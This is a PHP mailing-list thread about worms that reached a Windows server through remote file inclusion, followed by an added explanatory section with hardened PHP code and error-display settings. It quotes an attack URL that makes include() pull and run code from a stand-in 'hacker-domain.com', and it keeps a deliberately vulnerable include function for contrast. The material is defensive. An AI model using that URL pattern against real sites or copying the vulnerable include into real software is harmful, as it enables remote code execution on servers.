RE: [PHP-WIN] Re: Question on virus/worms

Turn off all error reporting (in php.ini) so that the error isn't pushed
to the screen. 

-----Original Message-----
From: Seak, Teng-Fong [mailto:seak.tf@xxxxxxxxxxxx] 
Sent: Friday, March 02, 2007 12:16 PM
To: php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx
Subject: [PHP-WIN] Re: Question on virus/worms

Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen 
> into Google and got a wealth of information.
    Yes, of course!  But what I can see there aren't far from useless
(cf what I write below).

Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
    I know these already.  The server is using McAfee.  So I'm quite
familiar with VIL of McAfee.  But the information given by these pages
isn't enough to let me know what to do and how those virus/worms managed
to get inside.
>>     Do they mean anything to anyone of you?  Do you know how they've 
>> got inside the computer?  Is there anything to do to prevent that?  
>> Are they known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written 
> scripts, over-reliance on scripts downloaded from the web and poor 
> server security.
>
> Hope that helps.
    No, not really :-(

    But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.

    Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?

    And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");

    This is enough to make infiltration possible!  IMO, this instruction
is supposed to be used like this, isn't it?  So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a total rewrite!  And there's no "poor server
security" that I can see.

    I've installed PHP5 and the problem seems fixed.  However, PHP
writes out where the problem occurs!  Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in C:\Inetpub\wwwroot\index.php on line X

    I don't want them (the hackers) to be able to read this either. 
That gives too much information about my server's file system.  How can
I stop that?

    By the way, I know there're still a lot of servers out there
using PHP4.  Is this vulnerability a known bug?  At least, I wasn't aware
of that before!

    Regards,

    Seak
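Added illustration (not code from either poster): the include("$page.php") pattern above is a remote file inclusion hole because the appended ".php" lands after the attacker's trailing "?" and becomes a query string the remote server ignores, so PHP fetches and executes some-worm-file.txt. The block below puts that vulnerable form next to an allow-list version in which the user's value never reaches include(), and shows the php.ini / ini_set() settings that keep the "URL file-access is disabled ... in C:\Inetpub\wwwroot\index.php on line X" style warning out of the HTTP response and in the error log instead. The page names, the pages/ directory and the log path are constructed for the example; it assumes PHP 7 or later for the ?? operator.

```php
<?php
// Added example, not from the mailing-list thread. Page names, the
// pages/ directory and the log path are constructed values.

// --- Vulnerable form, as quoted in the thread (shown for contrast) ---
// With URL file access enabled (allow_url_fopen, and on PHP >= 5.2
// allow_url_include), a request such as
//   index.php?page=http://hacker-domain.com/some-worm-file.txt?
// makes include() fetch and run remote code: the appended ".php"
// follows the "?" and is ignored by the remote server.
function vulnerable_include(string $page): void
{
    include("$page.php");
}

// --- Hardened form: only exact allow-list entries are ever included ---
const ALLOWED_PAGES = ['home', 'about', 'contact'];  // constructed list

function resolve_page(?string $page): string
{
    $page = $page ?? 'home';
    // Strict comparison against the allow-list: a URL, "../", a null
    // byte or any other attacker-controlled string falls back to home,
    // so $_GET['page'] itself is never part of the include() argument.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        $page = 'home';
    }
    return __DIR__ . '/pages/' . $page . '.php';
}

function safe_include(?string $page): void
{
    $file = resolve_page($page);
    if (!is_file($file)) {
        // Defence in depth: a missing file is logged, not reported to the
        // client with the server path in the message.
        error_log("page file missing: $file");
        http_response_code(404);
        return;
    }
    include $file;
}

// --- Keep diagnostics out of the response and in the log ---
// Equivalent php.ini settings (the reply above suggests turning off
// screen reporting; logging keeps the diagnostics for the admin):
//   display_errors   = Off
//   log_errors       = On
//   error_log        = C:\logs\php-error.log   ; constructed path
//   allow_url_fopen  = Off                     ; or allow_url_include = Off on PHP >= 5.2
ini_set('display_errors', '0');
ini_set('log_errors', '1');

safe_include($_GET['page'] ?? null);
```

With display_errors off, a request carrying a remote URL in page= gets the home page (or a 404 if the file is missing) and nothing about C:\Inetpub\wwwroot appears in the response; the warning, if any, is written to the configured error_log, which is where an admin reviewing the log files, as the poster did, would look for it.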





--
PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit:
http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


